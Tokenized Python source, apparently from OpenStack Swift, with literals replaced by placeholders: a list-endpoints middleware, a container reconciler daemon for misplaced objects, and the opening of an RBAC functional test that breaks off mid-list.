<s> """<STR_LIT>""" <EOL> import json <EOL> from six . moves . urllib . parse import quote , unquote <EOL> from swift . common . ring import Ring <EOL> from swift . common . utils import get_logger , split_path <EOL> from swift . common . swob import Request , Response <EOL> from swift . common . swob import HTTPBadRequest , HTTPMethodNotAllowed <EOL> from swift . common . storage_policy import POLICIES <EOL> from swift . proxy . controllers . base import get_container_info <EOL> RESPONSE_VERSIONS = ( <NUM_LIT:1.0> , <NUM_LIT> ) <EOL> class ListEndpointsMiddleware ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , app , conf ) : <EOL> self . app = app <EOL> self . logger = get_logger ( conf , log_route = '<STR_LIT>' ) <EOL> self . swift_dir = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . account_ring = Ring ( self . swift_dir , ring_name = '<STR_LIT>' ) <EOL> self . container_ring = Ring ( self . swift_dir , ring_name = '<STR_LIT>' ) <EOL> self . endpoints_path = conf . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if not self . endpoints_path . endswith ( '<STR_LIT:/>' ) : <EOL> self . endpoints_path += '<STR_LIT:/>' <EOL> self . default_response_version = <NUM_LIT:1.0> <EOL> self . response_map = { <EOL> <NUM_LIT:1.0> : self . v1_format_response , <EOL> <NUM_LIT> : self . v2_format_response , <EOL> } <EOL> def get_object_ring ( self , policy_idx ) : <EOL> """<STR_LIT>""" <EOL> return POLICIES . get_object_ring ( policy_idx , self . swift_dir ) <EOL> def _parse_version ( self , raw_version ) : <EOL> err_msg = '<STR_LIT>' % raw_version <EOL> try : <EOL> version = float ( raw_version . lstrip ( '<STR_LIT:v>' ) ) <EOL> except ValueError : <EOL> raise ValueError ( err_msg ) <EOL> if not any ( version == v for v in RESPONSE_VERSIONS ) : <EOL> raise ValueError ( err_msg ) <EOL> return version <EOL> def _parse_path ( self , request ) : <EOL> """<STR_LIT>""" <EOL> clean_path = request . path [ len ( self . endpoints_path ) - <NUM_LIT:1> : ] <EOL> try : <EOL> raw_version , rest = split_path ( clean_path , <NUM_LIT:1> , <NUM_LIT:2> , True ) <EOL> except ValueError : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> try : <EOL> version = self . _parse_version ( raw_version ) <EOL> except ValueError : <EOL> if raw_version . startswith ( '<STR_LIT:v>' ) and '<STR_LIT:_>' not in raw_version : <EOL> raise <EOL> version = self . default_response_version <EOL> rest = clean_path <EOL> else : <EOL> rest = '<STR_LIT:/>' + rest if rest else '<STR_LIT:/>' <EOL> try : <EOL> account , container , obj = split_path ( rest , <NUM_LIT:1> , <NUM_LIT:3> , True ) <EOL> except ValueError : <EOL> raise ValueError ( '<STR_LIT>' ) <EOL> return version , account , container , obj <EOL> def v1_format_response ( self , req , endpoints , ** kwargs ) : <EOL> return Response ( json . dumps ( endpoints ) , <EOL> content_type = '<STR_LIT:application/json>' ) <EOL> def v2_format_response ( self , req , endpoints , storage_policy_index , <EOL> ** kwargs ) : <EOL> resp = { <EOL> '<STR_LIT>' : endpoints , <EOL> '<STR_LIT>' : { } , <EOL> } <EOL> if storage_policy_index is not None : <EOL> resp [ '<STR_LIT>' ] [ <EOL> '<STR_LIT>' ] = str ( storage_policy_index ) <EOL> return Response ( json . dumps ( resp ) , <EOL> content_type = '<STR_LIT:application/json>' ) <EOL> def __call__ ( self , env , start_response ) : <EOL> request = Request ( env ) <EOL> if not request . path . startswith ( self . endpoints_path ) : <EOL> return self . app ( env , start_response ) <EOL> if request . method != '<STR_LIT:GET>' : <EOL> return HTTPMethodNotAllowed ( <EOL> req = request , headers = { "<STR_LIT>" : "<STR_LIT:GET>" } ) ( env , start_response ) <EOL> try : <EOL> version , account , container , obj = self . _parse_path ( request ) <EOL> except ValueError as err : <EOL> return HTTPBadRequest ( str ( err ) ) ( env , start_response ) <EOL> if account is not None : <EOL> account = unquote ( account ) <EOL> if container is not None : <EOL> container = unquote ( container ) <EOL> if obj is not None : <EOL> obj = unquote ( obj ) <EOL> storage_policy_index = None <EOL> if obj is not None : <EOL> container_info = get_container_info ( <EOL> { '<STR_LIT>' : '<STR_LIT>' % ( account , container ) } , <EOL> self . app , swift_source = '<STR_LIT>' ) <EOL> storage_policy_index = container_info [ '<STR_LIT>' ] <EOL> obj_ring = self . get_object_ring ( storage_policy_index ) <EOL> partition , nodes = obj_ring . get_nodes ( <EOL> account , container , obj ) <EOL> endpoint_template = '<STR_LIT>' + '<STR_LIT>' <EOL> elif container is not None : <EOL> partition , nodes = self . container_ring . get_nodes ( <EOL> account , container ) <EOL> endpoint_template = '<STR_LIT>' + '<STR_LIT>' <EOL> else : <EOL> partition , nodes = self . account_ring . get_nodes ( <EOL> account ) <EOL> endpoint_template = '<STR_LIT>' + '<STR_LIT>' <EOL> endpoints = [ ] <EOL> for node in nodes : <EOL> endpoint = endpoint_template . format ( <EOL> ip = node [ '<STR_LIT>' ] , <EOL> port = node [ '<STR_LIT:port>' ] , <EOL> device = node [ '<STR_LIT>' ] , <EOL> partition = partition , <EOL> account = quote ( account ) , <EOL> container = quote ( container or '<STR_LIT>' ) , <EOL> obj = quote ( obj or '<STR_LIT>' ) ) <EOL> endpoints . append ( endpoint ) <EOL> resp = self . response_map [ version ] ( <EOL> request , endpoints = endpoints , <EOL> storage_policy_index = storage_policy_index ) <EOL> return resp ( env , start_response ) <EOL> def filter_factory ( global_conf , ** local_conf ) : <EOL> conf = global_conf . copy ( ) <EOL> conf . update ( local_conf ) <EOL> def list_endpoints_filter ( app ) : <EOL> return ListEndpointsMiddleware ( app , conf ) <EOL> return list_endpoints_filter </s>
<s> import time <EOL> from collections import defaultdict <EOL> import socket <EOL> import itertools <EOL> import logging <EOL> from eventlet import GreenPile , GreenPool , Timeout <EOL> from swift . common import constraints <EOL> from swift . common . daemon import Daemon <EOL> from swift . common . direct_client import ( <EOL> direct_head_container , direct_delete_container_object , <EOL> direct_put_container_object , ClientException ) <EOL> from swift . common . internal_client import InternalClient , UnexpectedResponse <EOL> from swift . common . utils import get_logger , split_path , quorum_size , FileLikeIter , Timestamp , last_modified_date_to_timestamp , LRUCache , decode_timestamps <EOL> MISPLACED_OBJECTS_ACCOUNT = '<STR_LIT>' <EOL> MISPLACED_OBJECTS_CONTAINER_DIVISOR = <NUM_LIT> <EOL> CONTAINER_POLICY_TTL = <NUM_LIT:30> <EOL> def cmp_policy_info ( info , remote_info ) : <EOL> """<STR_LIT>""" <EOL> def is_deleted ( info ) : <EOL> return ( info [ '<STR_LIT>' ] > info [ '<STR_LIT>' ] and <EOL> info . get ( '<STR_LIT:count>' , info . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) == <NUM_LIT:0> ) <EOL> deleted = is_deleted ( info ) <EOL> remote_deleted = is_deleted ( remote_info ) <EOL> if any ( [ deleted , remote_deleted ] ) : <EOL> if not deleted : <EOL> return - <NUM_LIT:1> <EOL> elif not remote_deleted : <EOL> return <NUM_LIT:1> <EOL> return cmp ( remote_info [ '<STR_LIT>' ] , <EOL> info [ '<STR_LIT>' ] ) <EOL> def has_been_recreated ( info ) : <EOL> return ( info [ '<STR_LIT>' ] > info [ '<STR_LIT>' ] > <EOL> Timestamp ( <NUM_LIT:0> ) ) <EOL> remote_recreated = has_been_recreated ( remote_info ) <EOL> recreated = has_been_recreated ( info ) <EOL> if any ( [ remote_recreated , recreated ] ) : <EOL> if not recreated : <EOL> return <NUM_LIT:1> <EOL> elif not remote_recreated : <EOL> return - <NUM_LIT:1> <EOL> return cmp ( remote_info [ '<STR_LIT>' ] , <EOL> info [ '<STR_LIT>' ] ) <EOL> return cmp ( info [ '<STR_LIT>' ] , remote_info [ '<STR_LIT>' ] ) <EOL> def incorrect_policy_index ( info , remote_info ) : <EOL> """<STR_LIT>""" <EOL> if '<STR_LIT>' not in remote_info : <EOL> return False <EOL> if remote_info [ '<STR_LIT>' ] == info [ '<STR_LIT>' ] : <EOL> return False <EOL> return info [ '<STR_LIT>' ] != sorted ( <EOL> [ info , remote_info ] , cmp = cmp_policy_info ) [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> def translate_container_headers_to_info ( headers ) : <EOL> default_timestamp = Timestamp ( <NUM_LIT:0> ) . internal <EOL> return { <EOL> '<STR_LIT>' : int ( headers [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT>' : headers . get ( '<STR_LIT>' , <EOL> default_timestamp ) , <EOL> '<STR_LIT>' : headers . get ( '<STR_LIT>' , <EOL> default_timestamp ) , <EOL> '<STR_LIT>' : headers . get ( '<STR_LIT>' , <EOL> default_timestamp ) , <EOL> } <EOL> def best_policy_index ( headers ) : <EOL> container_info = map ( translate_container_headers_to_info , headers ) <EOL> container_info . sort ( cmp = cmp_policy_info ) <EOL> return container_info [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> def get_reconciler_container_name ( obj_timestamp ) : <EOL> """<STR_LIT>""" <EOL> _junk , _junk , ts_meta = decode_timestamps ( obj_timestamp ) <EOL> return str ( int ( ts_meta ) // <EOL> MISPLACED_OBJECTS_CONTAINER_DIVISOR * <EOL> MISPLACED_OBJECTS_CONTAINER_DIVISOR ) <EOL> def get_reconciler_obj_name ( policy_index , account , container , obj ) : <EOL> return "<STR_LIT>" % { <EOL> '<STR_LIT>' : policy_index , '<STR_LIT>' : account , <EOL> '<STR_LIT>' : container , '<STR_LIT>' : obj } <EOL> def get_reconciler_content_type ( op ) : <EOL> try : <EOL> return { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } [ op . lower ( ) ] <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % op ) <EOL> def get_row_to_q_entry_translator ( broker ) : <EOL> account = broker . account <EOL> container = broker . container <EOL> op_type = { <EOL> <NUM_LIT:0> : get_reconciler_content_type ( '<STR_LIT>' ) , <EOL> <NUM_LIT:1> : get_reconciler_content_type ( '<STR_LIT>' ) , <EOL> } <EOL> def translator ( obj_info ) : <EOL> name = get_reconciler_obj_name ( obj_info [ '<STR_LIT>' ] , <EOL> account , container , <EOL> obj_info [ '<STR_LIT:name>' ] ) <EOL> return { <EOL> '<STR_LIT:name>' : name , <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : obj_info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : obj_info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : op_type [ obj_info [ '<STR_LIT>' ] ] , <EOL> '<STR_LIT:size>' : <NUM_LIT:0> , <EOL> } <EOL> return translator <EOL> def add_to_reconciler_queue ( container_ring , account , container , obj , <EOL> obj_policy_index , obj_timestamp , op , <EOL> force = False , conn_timeout = <NUM_LIT:5> , response_timeout = <NUM_LIT:15> ) : <EOL> """<STR_LIT>""" <EOL> container_name = get_reconciler_container_name ( obj_timestamp ) <EOL> object_name = get_reconciler_obj_name ( obj_policy_index , account , <EOL> container , obj ) <EOL> if force : <EOL> x_timestamp = Timestamp ( time . time ( ) ) . internal <EOL> else : <EOL> x_timestamp = obj_timestamp <EOL> q_op_type = get_reconciler_content_type ( op ) <EOL> headers = { <EOL> '<STR_LIT>' : <NUM_LIT:0> , <EOL> '<STR_LIT>' : obj_timestamp , <EOL> '<STR_LIT>' : x_timestamp , <EOL> '<STR_LIT>' : q_op_type , <EOL> } <EOL> def _check_success ( * args , ** kwargs ) : <EOL> try : <EOL> direct_put_container_object ( * args , ** kwargs ) <EOL> return <NUM_LIT:1> <EOL> except ( ClientException , Timeout , socket . error ) : <EOL> return <NUM_LIT:0> <EOL> pile = GreenPile ( ) <EOL> part , nodes = container_ring . get_nodes ( MISPLACED_OBJECTS_ACCOUNT , <EOL> container_name ) <EOL> for node in nodes : <EOL> pile . spawn ( _check_success , node , part , MISPLACED_OBJECTS_ACCOUNT , <EOL> container_name , object_name , headers = headers , <EOL> conn_timeout = conn_timeout , <EOL> response_timeout = response_timeout ) <EOL> successes = sum ( pile ) <EOL> if successes >= quorum_size ( len ( nodes ) ) : <EOL> return container_name <EOL> else : <EOL> return False <EOL> def slightly_later_timestamp ( ts , offset = <NUM_LIT:1> ) : <EOL> return Timestamp ( ts , offset = offset ) . internal <EOL> def parse_raw_obj ( obj_info ) : <EOL> """<STR_LIT>""" <EOL> raw_obj_name = obj_info [ '<STR_LIT:name>' ] . encode ( '<STR_LIT:utf-8>' ) <EOL> policy_index , obj_name = raw_obj_name . split ( '<STR_LIT::>' , <NUM_LIT:1> ) <EOL> q_policy_index = int ( policy_index ) <EOL> account , container , obj = split_path ( obj_name , <NUM_LIT:3> , <NUM_LIT:3> , rest_with_last = True ) <EOL> try : <EOL> q_op = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } [ obj_info [ '<STR_LIT>' ] ] <EOL> except KeyError : <EOL> raise ValueError ( '<STR_LIT>' % <EOL> obj_info . get ( '<STR_LIT>' , None ) ) <EOL> return { <EOL> '<STR_LIT>' : q_policy_index , <EOL> '<STR_LIT>' : account , <EOL> '<STR_LIT>' : container , <EOL> '<STR_LIT>' : obj , <EOL> '<STR_LIT>' : q_op , <EOL> '<STR_LIT>' : decode_timestamps ( ( obj_info [ '<STR_LIT>' ] ) ) [ <NUM_LIT:0> ] , <EOL> '<STR_LIT>' : last_modified_date_to_timestamp ( <EOL> obj_info [ '<STR_LIT>' ] ) , <EOL> '<STR_LIT:path>' : '<STR_LIT>' % ( account , container , obj ) <EOL> } <EOL> @ LRUCache ( maxtime = CONTAINER_POLICY_TTL ) <EOL> def direct_get_container_policy_index ( container_ring , account_name , <EOL> container_name ) : <EOL> """<STR_LIT>""" <EOL> def _eat_client_exception ( * args ) : <EOL> try : <EOL> return direct_head_container ( * args ) <EOL> except ClientException as err : <EOL> if err . http_status == <NUM_LIT> : <EOL> return err . http_headers <EOL> except ( Timeout , socket . error ) : <EOL> pass <EOL> pile = GreenPile ( ) <EOL> part , nodes = container_ring . get_nodes ( account_name , container_name ) <EOL> for node in nodes : <EOL> pile . spawn ( _eat_client_exception , node , part , account_name , <EOL> container_name ) <EOL> headers = [ x for x in pile if x is not None ] <EOL> if len ( headers ) < quorum_size ( len ( nodes ) ) : <EOL> return <EOL> return best_policy_index ( headers ) <EOL> def direct_delete_container_entry ( container_ring , account_name , container_name , <EOL> object_name , headers = None ) : <EOL> """<STR_LIT>""" <EOL> pool = GreenPool ( ) <EOL> part , nodes = container_ring . get_nodes ( account_name , container_name ) <EOL> for node in nodes : <EOL> pool . spawn_n ( direct_delete_container_object , node , part , account_name , <EOL> container_name , object_name , headers = headers ) <EOL> pool . waitall ( ) <EOL> class ContainerReconciler ( Daemon ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , conf ) : <EOL> self . conf = conf <EOL> self . reclaim_age = int ( conf . get ( '<STR_LIT>' , <NUM_LIT> * <NUM_LIT:7> ) ) <EOL> self . interval = int ( conf . get ( '<STR_LIT>' , <NUM_LIT:30> ) ) <EOL> conf_path = conf . get ( '<STR_LIT>' ) or '<STR_LIT>' <EOL> self . logger = get_logger ( conf , log_route = '<STR_LIT>' ) <EOL> request_tries = int ( conf . get ( '<STR_LIT>' ) or <NUM_LIT:3> ) <EOL> self . swift = InternalClient ( conf_path , <EOL> '<STR_LIT>' , <EOL> request_tries ) <EOL> self . stats = defaultdict ( int ) <EOL> self . last_stat_time = time . time ( ) <EOL> def stats_log ( self , metric , msg , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> level = kwargs . pop ( '<STR_LIT>' , logging . DEBUG ) <EOL> log_message = '<STR_LIT>' % metric + msg <EOL> self . logger . log ( level , log_message , * args , ** kwargs ) <EOL> self . stats [ metric ] += <NUM_LIT:1> <EOL> def log_stats ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> now = time . time ( ) <EOL> should_log = force or ( now - self . last_stat_time > <NUM_LIT> ) <EOL> if should_log : <EOL> self . last_stat_time = now <EOL> self . logger . info ( '<STR_LIT>' , dict ( ** self . stats ) ) <EOL> def pop_queue ( self , container , obj , q_ts , q_record ) : <EOL> """<STR_LIT>""" <EOL> q_path = '<STR_LIT>' % ( MISPLACED_OBJECTS_ACCOUNT , container , obj ) <EOL> x_timestamp = slightly_later_timestamp ( max ( q_record , q_ts ) ) <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' , <EOL> q_path , q_ts , x_timestamp ) <EOL> headers = { '<STR_LIT>' : x_timestamp } <EOL> direct_delete_container_entry ( <EOL> self . swift . container_ring , MISPLACED_OBJECTS_ACCOUNT , <EOL> container , obj , headers = headers ) <EOL> def throw_tombstones ( self , account , container , obj , timestamp , <EOL> policy_index , path ) : <EOL> """<STR_LIT>""" <EOL> x_timestamp = slightly_later_timestamp ( timestamp ) <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> path , timestamp , policy_index , x_timestamp ) <EOL> headers = { <EOL> '<STR_LIT>' : x_timestamp , <EOL> '<STR_LIT>' : policy_index , <EOL> } <EOL> success = False <EOL> try : <EOL> self . swift . delete_object ( account , container , obj , <EOL> acceptable_statuses = ( <NUM_LIT:2> , <NUM_LIT> ) , <EOL> headers = headers ) <EOL> except UnexpectedResponse as err : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , timestamp , <EOL> policy_index , err ) <EOL> else : <EOL> success = True <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , timestamp , <EOL> policy_index ) <EOL> return success <EOL> def _reconcile_object ( self , account , container , obj , q_policy_index , q_ts , <EOL> q_op , path , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> container_policy_index = direct_get_container_policy_index ( <EOL> self . swift . container_ring , account , container ) <EOL> if container_policy_index is None : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> path , q_ts ) <EOL> return False <EOL> if container_policy_index == q_policy_index : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , q_ts , <EOL> container_policy_index , q_policy_index ) <EOL> return True <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' , path , q_ts , <EOL> container_policy_index ) <EOL> headers = { <EOL> '<STR_LIT>' : container_policy_index } <EOL> dest_obj = self . swift . get_object_metadata ( account , container , obj , <EOL> headers = headers , <EOL> acceptable_statuses = ( <NUM_LIT:2> , <NUM_LIT:4> ) ) <EOL> dest_ts = Timestamp ( dest_obj . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> if dest_ts >= q_ts : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , dest_ts , <EOL> container_policy_index , q_ts ) <EOL> return self . throw_tombstones ( account , container , obj , q_ts , <EOL> q_policy_index , path ) <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , q_ts , <EOL> q_policy_index , container_policy_index ) <EOL> self . logger . debug ( '<STR_LIT>' , path , <EOL> q_ts , q_policy_index ) <EOL> headers = { <EOL> '<STR_LIT>' : q_policy_index } <EOL> try : <EOL> source_obj_status , source_obj_info , source_obj_iter = self . swift . get_object ( account , container , obj , <EOL> headers = headers , <EOL> acceptable_statuses = ( <NUM_LIT:2> , <NUM_LIT:4> ) ) <EOL> except UnexpectedResponse as err : <EOL> source_obj_status = err . resp . status_int <EOL> source_obj_info = { } <EOL> source_obj_iter = None <EOL> source_ts = Timestamp ( source_obj_info . get ( '<STR_LIT>' , <NUM_LIT:0> ) ) <EOL> if source_obj_status == <NUM_LIT> and q_op == '<STR_LIT>' : <EOL> return self . ensure_tombstone_in_right_location ( <EOL> q_policy_index , account , container , obj , q_ts , path , <EOL> container_policy_index , source_ts ) <EOL> else : <EOL> return self . ensure_object_in_right_location ( <EOL> q_policy_index , account , container , obj , q_ts , path , <EOL> container_policy_index , source_ts , source_obj_status , <EOL> source_obj_info , source_obj_iter ) <EOL> def ensure_object_in_right_location ( self , q_policy_index , account , <EOL> container , obj , q_ts , path , <EOL> container_policy_index , source_ts , <EOL> source_obj_status , source_obj_info , <EOL> source_obj_iter , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> if source_obj_status // <NUM_LIT:100> != <NUM_LIT:2> or source_ts < q_ts : <EOL> if q_ts < time . time ( ) - self . reclaim_age : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> q_ts . internal , q_policy_index , <EOL> level = logging . CRITICAL ) <EOL> return True <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> q_ts . internal , q_policy_index , source_obj_status , <EOL> source_ts . internal , level = logging . WARNING ) <EOL> return False <EOL> ts = max ( Timestamp ( source_ts ) , q_ts ) <EOL> put_timestamp = slightly_later_timestamp ( ts , offset = <NUM_LIT:2> ) <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , <EOL> q_policy_index , container_policy_index , put_timestamp ) <EOL> headers = source_obj_info . copy ( ) <EOL> headers [ '<STR_LIT>' ] = container_policy_index <EOL> headers [ '<STR_LIT>' ] = put_timestamp <EOL> try : <EOL> self . swift . upload_object ( <EOL> FileLikeIter ( source_obj_iter ) , account , container , obj , <EOL> headers = headers ) <EOL> except UnexpectedResponse as err : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , q_policy_index , <EOL> container_policy_index , err , level = logging . WARNING ) <EOL> return False <EOL> except : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> source_ts , q_policy_index , container_policy_index , <EOL> level = logging . ERROR , exc_info = True ) <EOL> return False <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , <EOL> q_policy_index , container_policy_index , put_timestamp ) <EOL> return self . throw_tombstones ( account , container , obj , q_ts , <EOL> q_policy_index , path ) <EOL> def ensure_tombstone_in_right_location ( self , q_policy_index , account , <EOL> container , obj , q_ts , path , <EOL> container_policy_index , source_ts , <EOL> ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> delete_timestamp = slightly_later_timestamp ( q_ts , offset = <NUM_LIT:2> ) <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> source_ts , q_policy_index , container_policy_index , <EOL> delete_timestamp ) <EOL> headers = { <EOL> '<STR_LIT>' : container_policy_index , <EOL> '<STR_LIT>' : delete_timestamp , <EOL> } <EOL> try : <EOL> self . swift . delete_object ( account , container , obj , <EOL> headers = headers ) <EOL> except UnexpectedResponse as err : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , <EOL> source_ts , container_policy_index , <EOL> delete_timestamp , err , level = logging . WARNING ) <EOL> return False <EOL> except : <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , <EOL> container_policy_index , delete_timestamp , <EOL> level = logging . ERROR , exc_info = True ) <EOL> return False <EOL> self . stats_log ( '<STR_LIT>' , '<STR_LIT>' <EOL> '<STR_LIT>' , path , source_ts , <EOL> container_policy_index , delete_timestamp , <EOL> level = logging . INFO ) <EOL> return self . throw_tombstones ( account , container , obj , q_ts , <EOL> q_policy_index , path ) <EOL> def reconcile_object ( self , info ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( '<STR_LIT>' <EOL> '<STR_LIT>' , info [ '<STR_LIT:path>' ] , <EOL> info [ '<STR_LIT>' ] , info [ '<STR_LIT>' ] ) <EOL> success = False <EOL> try : <EOL> success = self . _reconcile_object ( ** info ) <EOL> except : <EOL> self . logger . exception ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> info [ '<STR_LIT:path>' ] , info [ '<STR_LIT>' ] , <EOL> info [ '<STR_LIT>' ] ) <EOL> if success : <EOL> metric = '<STR_LIT:success>' <EOL> msg = '<STR_LIT>' <EOL> else : <EOL> metric = '<STR_LIT>' <EOL> msg = '<STR_LIT>' <EOL> msg = '<STR_LIT>' + msg <EOL> self . stats_log ( metric , msg , info , level = logging . INFO ) <EOL> self . log_stats ( ) <EOL> return success <EOL> def _iter_containers ( self ) : <EOL> """<STR_LIT>""" <EOL> current_container = get_reconciler_container_name ( time . time ( ) ) <EOL> yield current_container <EOL> container_gen = self . swift . iter_containers ( MISPLACED_OBJECTS_ACCOUNT ) <EOL> self . logger . debug ( '<STR_LIT>' , <EOL> MISPLACED_OBJECTS_ACCOUNT ) <EOL> while True : <EOL> one_page = None <EOL> try : <EOL> one_page = list ( itertools . islice ( <EOL> container_gen , constraints . CONTAINER_LISTING_LIMIT ) ) <EOL> except UnexpectedResponse as err : <EOL> self . logger . error ( '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> MISPLACED_OBJECTS_ACCOUNT , err ) <EOL> if not one_page : <EOL> break <EOL> for c in reversed ( one_page ) : <EOL> container = c [ '<STR_LIT:name>' ] . encode ( '<STR_LIT:utf8>' ) <EOL> if container == current_container : <EOL> continue <EOL> yield container <EOL> def _iter_objects ( self , container ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( '<STR_LIT>' , container ) <EOL> found_obj = False <EOL> try : <EOL> for raw_obj in self . swift . iter_objects ( <EOL> MISPLACED_OBJECTS_ACCOUNT , container ) : <EOL> found_obj = True <EOL> yield raw_obj <EOL> except UnexpectedResponse as err : <EOL> self . logger . error ( '<STR_LIT>' , <EOL> container , err ) <EOL> if float ( container ) < time . time ( ) - self . reclaim_age and not found_obj : <EOL> self . swift . delete_container ( <EOL> MISPLACED_OBJECTS_ACCOUNT , container , <EOL> acceptable_statuses = ( <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) ) <EOL> def reconcile ( self ) : <EOL> """<STR_LIT>""" <EOL> self . logger . debug ( '<STR_LIT>' ) <EOL> for container in self . _iter_containers ( ) : <EOL> for raw_obj in self . _iter_objects ( container ) : <EOL> try : <EOL> obj_info = parse_raw_obj ( raw_obj ) <EOL> except Exception : <EOL> self . stats_log ( '<STR_LIT>' , <EOL> '<STR_LIT>' , raw_obj , <EOL> level = logging . ERROR , exc_info = True ) <EOL> continue <EOL> finished = self . reconcile_object ( obj_info ) <EOL> if finished : <EOL> self . pop_queue ( container , raw_obj [ '<STR_LIT:name>' ] , <EOL> obj_info [ '<STR_LIT>' ] , <EOL> obj_info [ '<STR_LIT>' ] ) <EOL> self . log_stats ( ) <EOL> self . logger . debug ( '<STR_LIT>' , container ) <EOL> def run_once ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . reconcile ( ) <EOL> except : <EOL> self . logger . exception ( '<STR_LIT>' ) <EOL> self . log_stats ( force = True ) <EOL> def run_forever ( self , * args , ** kwargs ) : <EOL> while True : <EOL> self . run_once ( * args , ** kwargs ) <EOL> self . stats = defaultdict ( int ) <EOL> self . logger . info ( '<STR_LIT>' , self . interval ) <EOL> time . sleep ( self . interval ) </s>
<s> import unittest <EOL> import uuid <EOL> from random import shuffle <EOL> from nose import SkipTest <EOL> from swiftclient import get_auth , http_connection <EOL> import test . functional as tf <EOL> def setUpModule ( ) : <EOL> tf . setup_package ( ) <EOL> def tearDownModule ( ) : <EOL> tf . teardown_package ( ) <EOL> TEST_CASE_FORMAT = ( <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:object_name>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> RBAC_PUT = [ <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , None , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' , None , None , '<STR_LIT>' , '<STR_LIT>' , None , <EOL> None , '<STR_LIT>' , '<STR_LIT>' , None , <NUM_LIT> ) , <EOL> ( '<STR_LIT>' 